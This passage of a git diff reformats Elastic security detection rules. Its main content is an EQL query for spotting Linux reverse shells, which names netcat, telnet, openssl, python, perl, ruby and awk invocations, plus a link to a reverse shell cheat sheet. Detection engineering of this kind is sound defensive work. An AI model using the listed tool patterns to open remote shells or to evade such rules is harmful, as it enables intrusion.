"https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json index 4c99744975e..57f218a6003 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json index d4ed703a72c..4178ee82731 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json index 874dff9bca5..66542e7f273 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json index f5700945055..844fdde6ec8 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_5.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Deprecated - Potential Reverse Shell via Suspicious Parent Process", "note": "This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule.", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json index 50aa0ab3195..a71f0f0bfe2 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_6.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Deprecated - Potential Reverse Shell via Suspicious Parent Process", "note": "This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule.", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args == \"-c\" and not process.args == \"/usr/bin/supervisord\") or\n (process.name : \"php*\" and process.args == \"-r\") or\n (process.name : \"perl\" and process.args == \"-e\") or\n (process.name : \"ruby\" and process.args in (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args == \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json index 71296115f79..e4eafeff9d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json index 73ece375def..627c0cedc5b 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json index 730cf4168ff..1dee1636186 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json index 3b6a0c97c60..79f0b508b82 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json index 8bcbcfc1917..a6bb4198ea7 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json index 37817693b96..dc77c44f164 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json index 691b61fc2f0..a17b9c701b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json index 9704521b5a1..d53a5740cc7 100644 --- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json index 8afc7fabfa5..3a1e6fe12bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json index e7be722a428..f7c313ff641 100644 --- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 